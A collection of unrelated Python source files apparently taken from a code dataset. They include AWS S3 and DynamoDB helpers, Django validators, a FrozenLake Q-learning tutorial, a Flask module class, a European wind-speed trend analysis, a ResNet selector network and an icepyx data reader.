_warning("Failed to fetch url '%s' : %s" % (url, e))
return None
if response is not None:
return response.content
return None
def put_s3_object(s3path, content):
""" s3path: Format must be s3://<bucketname>/<key>
"""
m = re.search("^s3://([-.\w]+)/(.*)", s3path)
if len(m.groups()) != 2:
return False
bucket, key = [m.group(1), m.group(2)]
key = "/".join([p for p in key.split("/") if p != ""]) # Remove extra '/'
client = boto3.client("s3")
try:
response = client.put_object(
Bucket=bucket,
Key=key,
Body=bytes(content, "utf-8"))
return true
except:
return False
def parse_line_as_list_of_dict(string, with_leading_string=True, leading_keyname="_", default=None):
if string is None:
return default
def _remove_escapes(s):
return s.replace("\\;", ";").replace("\\,", ",").replace("\\=", "=")
try:
l = []
for d in re.split("(?<!\\\\);", string):
if d == "": continue
dct = defaultdict(str)
el = re.split("(?<!\\\\),", d)
idx_start = 0
if with_leading_string:
key = el[0]
if key == "": continue
dct[leading_keyname] = _remove_escapes(key) #.replace("\\,", ",")
idx_start = 1
for item in el[idx_start:]:
i_el = re.split("(?<!\\\\)=", item, maxsplit=1)
dct[i_el[0]] = _remove_escapes(i_el[1]) if len(i_el) > 1 else True
l.append(dct)
return l
except:
return default
def dynamodb_table_scan(client, table_name, max_size=32*1024*1024):
xray_recorder.begin_subsegment("misc.dynamodb_table_scan")
items = []
items_size = []
size = 0
response = None
paginator = client.get_paginator('scan')
response_iterator = paginator.paginate(TableName=table_name, ConsistentRead=True)
for response in response_iterator:
if "Items" not in response: raise Exception("Failed to scan table '%s'!" % self.table_name)
# Flatten the structure to make it more useable
for i in response["Items"]:
item = {}
for k in i:
item[k] = i[k][list(i[k].keys())[0]]
if "Key" in item and "Value" in item:
items_size.append({"Key": item["Key"], "Size": len(item["Value"])})
# Do not manage expired records
if "ExpirationTime" in item:
expiration_time = int(item["ExpirationTime"])
if seconds_from_epoch_utc() > expiration_time:
continue
if max_size != -1:
item_size = 0
for k in item:
item_size += len(item[k])
if size + item_size > max_size:
break # Truncate too big DynamoDB table
else:
size += item_size
items.append(item)
log.log(log.NOTICE, f"DynamoDB: Table scan of '{table_name}' returned %d items (bytes={size})." % len(items))
if log.getEffectiveLevel() == log.DEBUG:
log.debug(f"Biggest items for table {table_name}:")
sorted_items = sorted(items_size, key=lambda item: item["Size"], reverse=True)
for i in sorted_items[:10]:
log.debug(f" Item: {i}")
xray_recorder.end_subsegment()
return items
@xray_recorder.capture()
def load_prerequisites(ctx, object_list):
for o in object_list:
xray_recorder.begin_subsegment("prereq:%s" % o)
log.debug(f"Loading prerequisite '{o}'...")
ctx[o].get_prerequisites()
xray_recorder.end_subsegment()
log.debug(f"End prerequisite loading...")
def initialize_clients(clients, ctx):
config = Config(
retries = {
'max_attempts': 5,
'mode': 'standard'
})
for c in clients:
k = "%s.client" % c
if k not in ctx:
log.debug("Initialize client '%s'." % c)
ctx[k] = boto3.client(c, config=config)
def discovery(ctx):
""" Returns a discovery JSON dict of essential environment variables
"""
context = ctx.copy()
for k in ctx.keys():
if (k.startswith("AWS_") or k.startswith("_AWS_") or k.startswith("LAMBDA") or
k.endswith("_SNSTopicArn") or
k in ["_HANDLER", "LD_LIBRARY_PATH", "LANG", "PATH", "TZ", "PYTHONPATH", "cwd", "FunctionName", "MainFunctionArn"] or
not isinstance(context[k], str)):
del context[k]
return json.loads(json.dumps(context, default=str))
| StarcoderdataPython |
3366125 | <reponame>abhinavtripathy/Volog
"""
File Name: Validators
Purpose: Functions for verifying that input is in an acceptable format.
Comments:
"""
from django.core.exceptions import ValidationError
from django.utils.timezone import now
def no_past_dates(date):
"""
This validator will raise a validation error if the passed in date is in the past.
:param date: Date Object being validated
:return: None
"""
if date < now().date():
raise ValidationError("Date cannot be in the past")
def no_future_dates(date):
"""
This validator will raise a validation error if the passed in date is in the future.
:param date: Date Object being validated
:return: None
"""
if date > now().date():
raise ValidationError("Date cannot be in the future")
def hour_instance_validator(hour):
"""
This validator will raise a validation error if the passed hour is (1) negative, or (2) more than 10.
:param hour: hour integer
:return: None
"""
if hour < 0:
raise ValidationError("Hour submission cannot be negative")
elif hour > 12:
raise ValidationError("Your hour submission is too high. Please submit activities separately.")
def minutes_validator(minutes):
"""
This validator will raise a validation error if the passed minutes are (1) negative or (2) not rounded to the
nearest 5 minutes .
:param minutes: minutes integer
:return: None
"""
if minutes < 0:
raise ValidationError("Minutes cannot be negative.")
elif minutes % 5 != 0:
raise ValidationError("Please round your minutes to a multiple of 5.")
def student_id_validator(sid):
"""
This validator will ensure that the provided id number is
(1) 7 digits long
(2) Unique in the database
Otherwise it raises a validation error.
:param sid: student id being tested
:return: None
"""
if len(str(sid)) != 7:
raise ValidationError("Student ID must be 7 digits long.")
| StarcoderdataPython |
56223 | <reponame>leedongminAI/Reinforcement_Basic<filename>RL_Lab_04_1.py
"""
Dummy Q-learning (table)
exploit&exploration and discounted future reward 에 대한 코드입니다.
"""
"""
exploit&exploration and discounted future reward을 해주는 이유는
Lab3에서는 랜덤하지 못하게(유연하지 못하게) state를 돌기 때문입니다.
안가본 곳도 가봐야 더 좋은 길이 있을 수도 있고, 더 효율성이 증가하기 때문에
안가본 곳도 한 번 가볼 필요가 있습니다.
두 가지만 정해주면 됩니다.
1. Select an action a -> exploit(내가 현재 있는 값을 이용한다.) & exploration(한 번 모험한다, 도전한다.)
2. Receive immediate reward r - > discounted reward
# Select an action a -> exploit & exploration에는 세 가지 방법이 있습니다.
# 'E-greedy'와 'dacaying E-greedy'와 'add random noise'
# 지금 보여드리는 코드는 add random noise이고, RL_Lab_04_2.py에 있는 것은 E-greedy입니다.
기본적인 코드들은 RL_Lab_03_1.py를 참고 바랍니다.
"""
import gym
import numpy as np
import matplotlib.pyplot as plt
from gym.envs.registration import register
register(
id='FrozenLake-v3',
entry_point='gym.envs.toy_text:FrozenLakeEnv',
kwargs={'map_name': '4x4',
'is_slippery': False}
)
env = gym.make('FrozenLake-v3')
# Initialize table with all zeros
Q = np.zeros([env.observation_space.n, env.action_space.n])
# Discount factor
dis = 0.99
"""discounted reward를 설정해줍니다. 보통은 0.99 or 0.9로 합니다."""
num_episodes = 2000
# create lists to contain total rewards and steps per episode
rList = []
for i in range(num_episodes):
# Reset environment and get first new observation
state = env.reset()
rAll = 0
done = False
# The Q-Table learning algorithm
while not done:
"""
Choose an action by greedily (with noise) picking from Q table
add random noise E&E입니다."""
action = np.argmax(Q[state, :] + np.random.randn(1, env.action_space.n) / (i + 1))
# Get new state and reward from environment
new_state, reward, done, _ = env.step(action)
# Update Q-Table with new knowledge using decay rate
Q[state, action] = reward + dis * np.max(Q[new_state, :])
""" 여기서 discounted reward를 정했던 dis가 들어갑니다. """
rAll += reward
state = new_state
rList.append(rAll)
print("Success rate: " + str(sum(rList) / num_episodes))
print("Final Q-Table Values")
print(Q)
plt.bar(range(len(rList)), rList, color="blue")
plt.show()
| StarcoderdataPython |
1683632 | import argparse
def get_args():
parser = argparse.ArgumentParser()
# Data file
parser.add_argument('--train_file',
type=str,
default=None,
help='Training file')
parser.add_argument('--dev_file',
type=str,
default=None,
help='Development file')
parser.add_argument('--test_file',
type=str,
default=None,
help='test file')
parser.add_argument('--vocab_file',
type=str,
default="vocab.pkl",
help='dictionary file')
parser.add_argument('--vocab_size',
type=int,
default=50000,
help='maximum number of vocabulary')
parser.add_argument('--batch_size',
type=int,
default=64,
help='Batch size')
# Model details
parser.add_argument('--use_cuda',
type=int,
default=0,
help='use cuda GPU or not 0|1')
parser.add_argument('--model_file',
type=str,
default="model.th",
help='model file')
parser.add_argument('--model',
type=str,
default="HingeModelCriterion",
help='choose the loss criterion')
parser.add_argument('--embedding_size',
type=int,
default=300,
help='Default embedding size if embedding_file is not given')
parser.add_argument('--hidden_size',
type=int,
default=128,
help='Hidden size of RNN units')
parser.add_argument('--num_layers',
type=int,
default=1,
help='Number of RNN layers')
# training details
parser.add_argument('--num_epochs',
type=int,
default=10,
help='Number of epochs')
parser.add_argument('--eval_epoch',
type=int,
default=1,
help='Evaluation on dev set after K epochs')
parser.add_argument('--optimizer',
type=str,
default='Adam',
help='Optimizer: sgd or adam (default) or rmsprop')
parser.add_argument('--learning_rate', '-lr',
type=float,
default=0.1,
help='Learning rate for SGD')
return parser.parse_args()
| StarcoderdataPython |
1745614 | # -*- coding: utf-8 -*-
"""
flask.module
~~~~~~~~~~~~
Implements a class that represents module blueprints.
:copyright: (c) 2011 by <NAME>.
:license: BSD, see LICENSE for more details.
"""
import os
from .blueprints import Blueprint
def blueprint_is_module(bp):
"""Used to figure out if something is actually a module"""
return isinstance(bp, Module)
class Module(Blueprint):
"""Deprecated module support. Until Flask 0.6 modules were a different
name of the concept now available as blueprints in Flask. They are
essentially doing the same but have some bad semantics for templates and
static files that were fixed with blueprints.
.. versionchanged:: 0.7
Modules were deprecated in favor for blueprints.
"""
def __init__(self, import_name, name=None, url_prefix=None,
static_path=None, subdomain=None):
if name is None:
assert '.' in import_name, 'name required if package name ' \
'does not point to a submodule'
name = import_name.rsplit('.', 1)[1]
Blueprint.__init__(self, name, import_name, url_prefix=url_prefix,
subdomain=subdomain, template_folder='templates')
if os.path.isdir(os.path.join(self.root_path, 'static')):
self._static_folder = 'static'
| StarcoderdataPython |
1648791 | import warnings
import glob
import os
from scipy.stats import linregress, norm
import xarray as xr
import pandas as pd
import numpy as np
from mpl_toolkits.axes_grid1.inset_locator import inset_axes
import matplotlib.patches as mpatches
import matplotlib.pyplot as plt
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=ImportWarning)
import cartopy.crs as ccrs
import cartopy.mpl.geoaxes
from utils import (
ensemble_mean_wind_speed,
annual_mean,
add_letters,
open_picontrol,
selbox,
open_datasets,
LONMAX,
LONMIN,
LATMIN,
LATMAX,
)
P_THRESHOLD = 5
def selHadISD(ds, path_to_data):
"""
averages over all station locations used in Zeng et al. (2019) from the HadISD dataset
:param ds:
:return:
"""
# load HadISD station list and limit to region of interest
station_list = pd.read_excel(
f"{path_to_data}/HadISD/Zeng_SIData2_HadISDv202.xlsx",
usecols=["lons", "lats"], sheet_name="stations"
)
station_list = station_list.where(
(station_list.lons < LONMAX)
& (station_list.lons > LONMIN)
& (station_list.lats > LATMIN)
& (station_list.lats < LATMAX)
).dropna()
# interpolate input data to HadISD stations and return the station mean
ds_stations = []
for index, row in station_list.iterrows():
ds_stations.append(ds.interp(lat=row["lats"], lon=row["lons"], method="linear"))
return xr.concat(ds_stations, dim="station_number").mean(dim="station_number")
def slope_if_significant(y, p_threshold=P_THRESHOLD, trend_length=20):
"""
Calculates the slope by fitting a linear trend of length trend_length to the timeseries y.
If the slope is not statistically significant at the p-values provided
as p_threhold, the function returns nan.
:param y:
:param p_threshold:
:param trend_length:
:return:
"""
p_threshold = p_threshold / 100 # from percentage to fraction
res = linregress(np.arange(trend_length) / 10, y)
if res[3] < p_threshold:
return res[0]
else:
return np.nan
def calc_frac_partoftrend(y):
"""
computes the number of timesteps that are part of a 20 timestep trend
:param y:
:return:
"""
y = y.copy()
y[np.isfinite(y)] = 1 # all values are 1
y[np.isnan(y)] = 0
for i in range(y.size):
if y[i] == 1:
for j in range(1, 20):
try:
# if next timestep doesn't feature new trend increase weight
if y[i + j] == 0:
y[i] += 1
else:
break
except IndexError:
# add remaining years to 20y at the end of the timeseries
y[i] += 20 - j
break
return np.round(y.sum() / (y.size + 19) * 100)
def test_calc_frac_partoftrend():
# test frac_partoftrend
test_array = (
np.zeros(81) * np.nan
) # 81 year slope timeseries corresponds to 100y input data
test_array[3] = 3
assert calc_frac_partoftrend(test_array) == 20.0 / 100 * 100
test_array[-1] = 2
assert calc_frac_partoftrend(test_array) == 40.0 / 100 * 100
test_array[4] = 1
assert calc_frac_partoftrend(test_array) == 41.0 / 100 * 100
test_array[:] = 2
assert calc_frac_partoftrend(test_array) == 100.0
print("Test of function `calc_frac_partoftrend` completed succesfully")
def plot_histo(
slopes,
ax,
experiment,
full_output=False,
bins=50,
trend_length=20,
p_threshold=P_THRESHOLD,
):
"""
Plots histogram of wind speed trends that are significant at a given p value threshold
along with the observation-based estimates taken from earlier studies.
:param slopes:
:param ax:
:param experiment:
:param full_output:
:param bins:
:param trend_length:
:param p_threshold:
:return:
"""
n, bins, patches = ax.hist(
slopes[np.isfinite(slopes)],
bins=bins,
density=True,
color="darkorange",
alpha=0.7,
)
ax.set_xlim(xmin=-0.2, xmax=0.2)
textdic = {
"horizontalalignment": "center",
"verticalalignment": "center",
"rotation": 90,
"fontsize": 8,
}
ax.axvline(x=-0.09, color="purple", ls="--") # p.1, 2nd column, 1st paragraph
ax.text(-0.083, n.max() * 3.0 / 4, "Vautard et al. [2010] 1979 - 2008", textdic)
ax.axvline(x=-0.1, color="purple", ls="--") # from SI Fig. 4e
ax.text(-0.107, n.max() * 3.0 / 4, "Zeng et al. [2019] 1978 - 2003", textdic)
ax.axvline(x=0.11, color="purple", ls="--") # from SI Fig. 4e
ax.text(0.103, n.max() * 3.0 / 4, "Zeng et al. [2019] 2004 - 2017", textdic)
frac_partoftrend = calc_frac_partoftrend(slopes)
xlabel = f"Significant wind speed trends at {100 - p_threshold}% level [m/s/decade]"
ax.set_xlabel(xlabel, fontsize=12)
plot_title = f"{experiment}: {int(frac_partoftrend)}% of years belong to a {trend_length}y trend period"
ax.set_title(plot_title)
if full_output:
return n, bins, frac_partoftrend
else:
return bins
def plot_full_timeseries_with_trend_marks(path_to_data, path_to_plots):
"""
Plots annual and 20y running-mean wind speed timeseries during pre-industrial control.
Markers or red and blue color denote onsets of significant 20y trend periods.
A map of the considered domain is added.
:param path_to_data:
:param path_to_plots:
:return:
"""
# plot full timeseries and mark trends
ds_picontrol = open_picontrol(path_to_data)
slopes = np.asarray(
[
slope_if_significant(
ds_picontrol["sfcWind"][x : x + 20], p_threshold=P_THRESHOLD
)
for x in range(1980)
]
)
slopes_ts = xr.DataArray(
slopes, dims="time", coords={"time": ds_picontrol["sfcWind"].time[:1980]}
)
# plot slopes and mark trend onsets
f, ax = plt.subplots(figsize=(12, 5))
ds_picontrol["sfcWind"].plot(ax=ax, alpha=0.5, label="Annual mean")
ds_picontrol["sfcWind"].rolling(time=20, center=True).mean().dropna(
dim="time"
).plot(ax=ax, color="black", label="20y mean")
ds_picontrol["sfcWind"].where(slopes_ts > 0).plot.line(
marker="o", linewidth=0, color="red", alpha=0.7, label="onset upward trend"
)
ds_picontrol["sfcWind"].where(slopes_ts < 0).plot.line(
marker="o", linewidth=0, color="green", alpha=0.7, label="onset downward trend"
)
# add inset with map of focus region
axins = inset_axes(
ax,
width="10%",
height="20%",
loc="upper left",
axes_class=cartopy.mpl.geoaxes.GeoAxes,
axes_kwargs=dict(map_projection=ccrs.PlateCarree()),
)
axins.set_extent((LONMIN - 1, LONMAX + 1, LATMIN - 1.5, LATMAX + 0.5))
axins.add_feature(cartopy.feature.COASTLINE.with_scale("50m"), lw=0.2)
axins.add_feature(cartopy.feature.BORDERS.with_scale("50m"), lw=0.15)
axins.add_patch(
mpatches.Rectangle(
xy=[LONMIN, LATMIN],
width=LONMAX - LONMIN,
height=LATMAX - LATMIN,
facecolor="blue",
alpha=0.2,
transform=ccrs.PlateCarree(),
)
)
axins.outline_patch.set_visible(False)
ax.legend(loc="upper right", ncol=2)
ax.set_xlabel("Year of pi-control simulation", fontsize=12)
ax.set_ylabel("European mean wind speed [m/s]", fontsize=12)
ax.set_title("")
ax.set_ylim(ymax=5.42)
ax.set_xlim(xmin=ds_picontrol.time[0].values, xmax=ds_picontrol.time[-1].values)
plt.tight_layout()
plt.savefig(f"{path_to_plots}/timeseries_picontrol_Europe.jpeg", dpi=300)
plt.close("all")
def plot_trend_histograms(path_to_data, path_to_plots):
"""
Plots trend histograms for different combinations of
- trend lengths (15, 20, 25 years)
- aggregation types (box average or interpolated to HadISD station locations)
- significance levels (p values of 0.05, 0.1, 0.15, 1)
A Gaussian is fitted to those plots where no significance screening is applied (i.e. p=1)
:param path_to_data:
:param path_to_plots:
:return:
"""
ds_picontrol = open_picontrol(path_to_data)
ds_list_HadISD = [
selHadISD(annual_mean(xr.open_dataset(x, use_cftime=True)), path_to_data)
for x in sorted(glob.glob(f"{path_to_data}/pi-control/*.nc"))
] # use_cftime needed after 2200. Otherwise SerializationWarning is raised
ds_picontrol_HadISD = xr.concat(ds_list_HadISD, dim="time")
# PI-CONTROL plot trend histograms for different p-values
for trend_length in [15, 20, 25]:
# HadISD is sensitivity test with data averaged to European HadISD stations
for agg_type in ["HadISD", "box"]:
for p_threshold in [5, 10, 15, 100]:
if agg_type == "box":
ds_tmp = ds_picontrol.copy()
else:
ds_tmp = ds_picontrol_HadISD.copy()
slopes = np.asarray(
[
slope_if_significant(
ds_tmp["sfcWind"][x : x + trend_length],
p_threshold=p_threshold,
trend_length=trend_length,
)
for x in range(ds_tmp.time.size - trend_length)
]
)
f, ax = plt.subplots()
bins = plot_histo(
slopes,
ax,
"Pi-control",
trend_length=trend_length,
p_threshold=p_threshold,
)
# fit Gaussian to histogram without significance screening
if p_threshold == 100:
mu, std = norm.fit(slopes)
ax.plot(bins, norm.pdf(bins, mu, std), color="red")
ax.set_ylabel("MPI-GE PDF", fontsize=12)
add_letters(ax)
plt.tight_layout()
if agg_type == "box":
fig_path = f"{path_to_plots}/picontrol_wind_trends_Europe_{p_threshold}_{trend_length}y.jpeg"
else:
fig_path = f"{path_to_plots}/picontrol_HadISD_wind_trends_Europe_{p_threshold}_{trend_length}y.jpeg"
plt.savefig(fig_path, dpi=300)
plt.close("all")
def plot_pi_control_cmip6_trend_histograms(path_to_data, path_to_plots):
# PI-CONTROL trend histograms for CMIP6 ensemble
filelist = glob.glob(f"{path_to_data}/CMIP6_annual/*.nc")
models = np.unique([x.split("/")[-1].split("_")[2] for x in filelist])
CMIP6_histos = {}
CMIP6_bins = np.arange(-0.2, 0.2, 0.005)
for i, model in enumerate(models):
print(str(int(i / len(models) * 100)) + "%")
ds_list = [
selbox(xr.open_dataset(x, use_cftime=True))
for x in sorted(glob.glob(f"{path_to_data}/CMIP6_annual/*{model}*.nc"))
] # use_cftime needed after 2200. Otherwise SerializationWarning is raised
ds_CMIP6 = xr.concat(ds_list, dim="time")
slopes = np.asarray(
[
slope_if_significant(
ds_CMIP6["sfcWind"][x : x + 20], p_threshold=P_THRESHOLD
)
for x in range(ds_CMIP6.time.size - 20)
]
)
f, ax = plt.subplots()
CMIP6_histos[model] = plot_histo(
slopes,
ax,
"Pi-control " + model,
full_output=True,
bins=CMIP6_bins,
p_threshold=P_THRESHOLD,
)
ax.set_ylabel("PDF")
plt.tight_layout()
os.makedirs(f"{path_to_plots}/CMIP6", exist_ok=True)
fig_path = f"{path_to_plots}/CMIP6/{model}_picontrol_wind_trends_Europe_{P_THRESHOLD}.jpeg"
plt.savefig(fig_path, dpi=300)
plt.close("all")
# ensemble mean histo
del CMIP6_histos["EC-Earth3-CC"] # has no data
del CMIP6_histos["AWI-ESM-1-1-LR"] # only has negative trends of -0.07 m/s/dec
df_CMIP6 = pd.DataFrame(CMIP6_histos, index=["n", "bins", "fracoftrends"])
n_mean, frac_mean = df_CMIP6.loc["n"].mean(), df_CMIP6.loc["fracoftrends"].mean()
f, ax = plt.subplots()
ax.bar(CMIP6_bins[1:], n_mean, width=0.005, color="Darkorange", alpha=0.7)
textdic = {
"horizontalalignment": "center",
"verticalalignment": "center",
"rotation": 90,
"fontsize": 8,
}
ax.axvline(x=-0.09, color="purple", ls="--") # p.1, 2nd column, 1st paragraph
ax.text(
-0.083, n_mean.max() * 3.0 / 4, "<NAME> al. [2010] 1979 - 2008", textdic
)
ax.axvline(x=-0.1, color="purple", ls="--") # from SI Fig. 4e
ax.text(-0.107, n_mean.max() * 3.0 / 4, "Zeng et al. [2019] 1978 - 2003", textdic)
ax.axvline(x=0.11, color="purple", ls="--") # from SI Fig. 4e
ax.text(0.103, n_mean.max() * 3.0 / 4, "Zeng et al. [2019] 2004 - 2017", textdic)
ax.set_ylabel("CMIP6 ensemble mean PDF", fontsize=12)
xlabel = f"Significant wind speed trends at {100 - P_THRESHOLD}% level [m/s/decade]"
ax.set_xlabel(xlabel, fontsize=12)
ax.set_title(f"Pi-control: {int(frac_mean)}% of years belong to a 20y trend period")
ax.set_xlim(xmin=-0.2, xmax=0.2)
add_letters(ax, letter_offset=1)
plt.tight_layout()
os.makedirs(f"{path_to_plots}/CMIP6", exist_ok=True)
fig_path = (
f"{path_to_plots}/CMIP6/Ensmean_picontrol_wind_trends_Europe_{P_THRESHOLD}.jpeg"
)
plt.savefig(fig_path, dpi=300)
plt.close("all")
def plot_experiment_trend_histograms(path_to_data, path_to_plots):
# trend histograms in other periods
for letter_index, experiment in enumerate(
["historical", "rcp26", "rcp45", "rcp85"]
):
print(experiment)
windfiles = sorted(glob.glob(f"{path_to_data}/{experiment}/sfcWind*.nc"))
ds = open_datasets(windfiles)
ds_ensmean = annual_mean(
selbox(ensemble_mean_wind_speed(path_to_data, experiment))
)
# Get internal variability as wind speed minus ensemble mean wind speed
ds_internal = ds - ds_ensmean
for p_threshold in [5, 100]:
# calculate trend slopes in individual ens members
slopes = []
for ens_member in ds_internal.ensemble_member:
da_internal = ds_internal["sfcWind"].sel(
{"ensemble_member": ens_member}
)
slopes.extend(
[
slope_if_significant(
da_internal[x : x + 20], p_threshold=p_threshold
)
for x in range(da_internal.size - 20)
]
)
slopes = np.asarray(slopes)
# calculate trend slopes in ensemble mean
slopes_ensmean = np.asarray(
[
slope_if_significant(
ds_ensmean["sfcWind"][x : x + 20], p_threshold=p_threshold
)
for x in range(ds_ensmean.time.size - 20)
]
)
# plotting
f, ax = plt.subplots()
ax2 = ax.twinx()
bins = plot_histo(slopes, ax, experiment, p_threshold=p_threshold)
ax2.hist(
slopes_ensmean[np.isfinite(slopes_ensmean)],
bins=50,
density=True,
color="darkgreen",
alpha=0.7,
label="ensemble mean",
)
ax.set_ylabel("PDF ensemble members", color="darkorange", fontsize=12)
ax2.set_ylabel("PDF ensemble mean", color="darkgreen", fontsize=12)
# fit Gaussian to histogram without significance screening
if p_threshold == 100:
mu, std = norm.fit(slopes)
ax.plot(bins, norm.pdf(bins, mu, std), color="red")
add_letters(ax, letter_offset=letter_index)
plt.tight_layout()
fig_path = f"{path_to_plots}/{experiment}_wind_trends_Europe_{p_threshold}_all.jpeg"
plt.savefig(fig_path, dpi=300)
plt.close("all") | StarcoderdataPython |
1694660 | <gh_stars>0
import os
import sys
#print(os.path.abspath('../../..'))
def tester():
"""
here are some things but idk
"""
return 0 | StarcoderdataPython |
1653462 | <reponame>bareblackfoot/faster-rcnn.selection<gh_stars>0
# --------------------------------------------------------
# Tensorflow Faster R-CNN
# Licensed under The MIT License [see LICENSE for details]
# Written by <NAME> and <NAME>
# --------------------------------------------------------
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
import tensorflow.contrib.slim as slim
from tensorflow.contrib.slim import losses
from tensorflow.contrib.slim import arg_scope
from tensorflow.contrib.slim.python.slim.nets import resnet_utils
from tensorflow.contrib.slim.python.slim.nets import resnet_v1
from tensorflow.contrib.slim.python.slim.nets.resnet_v1 import resnet_v1_block
import numpy as np
# from nets.network import Network
from model.config import cfg
def resnet_arg_scope(is_training=True,
batch_norm_decay=0.997,
batch_norm_epsilon=1e-5,
batch_norm_scale=True):
batch_norm_params = {
'is_training': False,
'decay': batch_norm_decay,
'epsilon': batch_norm_epsilon,
'scale': batch_norm_scale,
'trainable': False,
'updates_collections': tf.GraphKeys.UPDATE_OPS
}
with arg_scope(
[slim.conv2d],
weights_regularizer=slim.l2_regularizer(cfg.TRAIN.WEIGHT_DECAY),
weights_initializer=slim.variance_scaling_initializer(),
trainable=is_training,
activation_fn=tf.nn.relu,
normalizer_fn=slim.batch_norm,
normalizer_params=batch_norm_params):
with arg_scope([slim.batch_norm], **batch_norm_params) as arg_sc:
return arg_sc
class selector(object):
def __init__(self, mode):
# Network.__init__(self)
self.training = mode == 'TRAIN'
self.testing = mode == 'TEST'
self._scope = 'selector'
self._decide_blocks()
# H = W = 300
self._image = tf.placeholder(tf.float32, shape=[1, None, None, 3])
# Do the first few layers manually, because 'SAME' padding can behave inconsistently
# for images of different sizes: sometimes 0, sometimes 1
def _build_base(self):
with tf.variable_scope(self._scope, self._scope):
net = resnet_utils.conv2d_same(self._image, 64, 7, stride=2, scope='conv1')
net = tf.pad(net, [[0, 0], [1, 1], [1, 1], [0, 0]])
net = slim.max_pool2d(net, [3, 3], stride=2, padding='VALID', scope='pool1')
return net
def select(self, num_select, reuse=None):
assert (0 <= cfg.RESNET.FIXED_BLOCKS <= 3)
# Now the base is always fixed during training
with slim.arg_scope(resnet_arg_scope(is_training=False)):
net_conv = self._build_base()
if cfg.RESNET.FIXED_BLOCKS > 0:
with slim.arg_scope(resnet_arg_scope(is_training=False)):
net_conv, _ = resnet_v1.resnet_v1(net_conv,
self._blocks[0:cfg.RESNET.FIXED_BLOCKS],
global_pool=False,
include_root_block=False,
reuse=reuse,
scope=self._scope)
if cfg.RESNET.FIXED_BLOCKS < 3:
with slim.arg_scope(resnet_arg_scope(is_training=self.training)):
net_conv, _ = resnet_v1.resnet_v1(net_conv,
self._blocks[cfg.RESNET.FIXED_BLOCKS:-1],
global_pool=False,
include_root_block=False,
reuse=reuse,
scope=self._scope)
net_conv = slim.conv2d(net_conv, num_outputs=128, kernel_size=[1, 1], padding="SAME", scope="c1_s1")
net_conv = slim.conv2d(net_conv, num_outputs=num_select, kernel_size=[1, 1], padding="SAME", activation_fn=None, scope="c1_s2")
# Selection; Find the selector index
idx = tf.argmax(tf.nn.softmax(net_conv, -1), -1)
return idx
def _decide_blocks(self):
# choose different blocks for different number of layers
self._blocks = [resnet_v1_block('block1', base_depth=16, num_units=3, stride=2),
resnet_v1_block('block2', base_depth=32, num_units=4, stride=2),
# use stride 1 for the last conv4 layer
resnet_v1_block('block3', base_depth=64, num_units=6, stride=1),
resnet_v1_block('block4', base_depth=128, num_units=3, stride=1)]
| StarcoderdataPython |
3389698 | <reponame>bessoh2/integration_station
import fnmatch
from intake.catalog import Catalog
import os
import xarray as xr
"""
IMPORTANT NOTES
This code is currently UNDER DEVELOPMENT for the icepyx (https://github.com/icesat2py/icepyx) library for working with ICESat-2 data.
This version of the code is static and will only be manipulated as needed for the July 2021 SnowEx Hackweek project.
Ultimately, this functionality will be improved, tested, and included as a standard part of the icepyx package.
You're encouraged to use that version in any workflows for tracibility and reproducibility, as this version will not be maintained.
Please contact Jessica (@JessicaS11) for more info or with any questions.
"""
def _get_datasource_type(): # filepath):
"""
Determine if the input is from a local system or is an s3 bucket
Not needed now, but will need to use for cloud data access
"""
source_types = ["is2_local", "is2_s3"]
return source_types[0]
def _validate_source(source):
"""
Check that the entered data source paths are valid
"""
# acceptable inputs (for now) are a single file or directory
assert type(source) == str, "You must enter your input as a string."
assert (
os.path.isdir(source) == True or os.path.isfile(source) == True
), "Your data source string is not a valid data source."
return True
def _pattern_to_glob(pattern):
"""
Adapted from intake.source.utils.path_to_glob to convert a path as pattern into a glob style path
that uses the pattern's indicated number of '?' instead of '*' where an int was specified.
Returns pattern if pattern is not a string.
Parameters
----------
pattern : str
Path as pattern optionally containing format_strings
Returns
-------
glob : str
Path with int format strings replaced with the proper number of '?' and '*' otherwise.
Examples
--------
>>> _pattern_to_glob('{year}/{month}/{day}.csv')
'*/*/*.csv'
>>> _pattern_to_glob('{year:4}/{month:2}/{day:2}.csv')
'????/??/??.csv'
>>> _pattern_to_glob('data/{year:4}{month:02}{day:02}.csv')
'data/????????.csv'
>>> _pattern_to_glob('data/*.csv')
'data/*.csv'
"""
from string import Formatter
if not isinstance(pattern, str):
return pattern
fmt = Formatter()
glob = ""
prev_field_name = None
for literal_text, field_name, format_specs, _ in fmt.parse(pattern):
glob += literal_text
if field_name and (glob[-1] != "*"):
try:
glob += "?" * int(format_specs)
except ValueError:
glob += "*"
# alternatively, you could use bits=utils._get_parts_of_format_string(resolved_string, literal_texts, format_specs)
# and then use len(bits[i]) to get the length of each format_spec
# print(glob)
return glob
def _run_fast_scandir(dir, fn_glob):
"""
Quickly scan nested directories to get a list of filenames that match the fn_glob string.
Modified from https://stackoverflow.com/a/59803793/2441026
(faster than os.walk or glob methods, and allows filename matching in subdirectories).
Parameters
----------
dir : str
full path to the input directory
fn_glob : str
glob-style filename pattern
Outputs
-------
subfolders : list
list of strings of all nested subdirectories
files : list
list of strings containing full paths to each file matching the filename pattern
"""
subfolders, files = [], []
for f in os.scandir(dir):
if f.is_dir():
subfolders.append(f.path)
if f.is_file():
if fnmatch.fnmatch(f.name, fn_glob):
files.append(f.path)
for dir in list(subfolders):
sf, f = _run_fast_scandir(dir, fn_glob)
subfolders.extend(sf)
files.extend(f)
return subfolders, files
def _check_source_for_pattern(source, filename_pattern):
"""
Check that the entered data source contains files that match the input filename_pattern
"""
glob_pattern = _pattern_to_glob(filename_pattern)
if os.path.isdir(source):
_, filelist = _run_fast_scandir(source, glob_pattern)
assert len(filelist) > 0, "None of your filenames match the specified pattern."
print(
f"You have {len(filelist)} files matching the filename pattern to be read in."
)
return True
elif os.path.isfile(source):
assert fnmatch.fnmatch(
os.path.basename(source), glob_pattern
), "Your input filename does not match the filename pattern."
return True
else:
return False
class Read:
"""
Data object to create and use Intake catalogs to read ICESat-2 data into the specified formats.
Provides flexiblity for reading nested hdf5 files into common analysis formats.
Parameters
----------
data_source : string
A string with a full file path or full directory path to ICESat-2 hdf5 (.h5) format files.
Files within a directory must have a consistent filename pattern.
filename_pattern : string, default 'ATL{product:2}_{datetime:%Y%m%d%H%M%S}_{rgt:4}{cycle:2}{orbitsegment:2}_{version:3}_{revision:2}.h5'
String that shows the filename pattern as required for Intake's path_as_pattern argument.
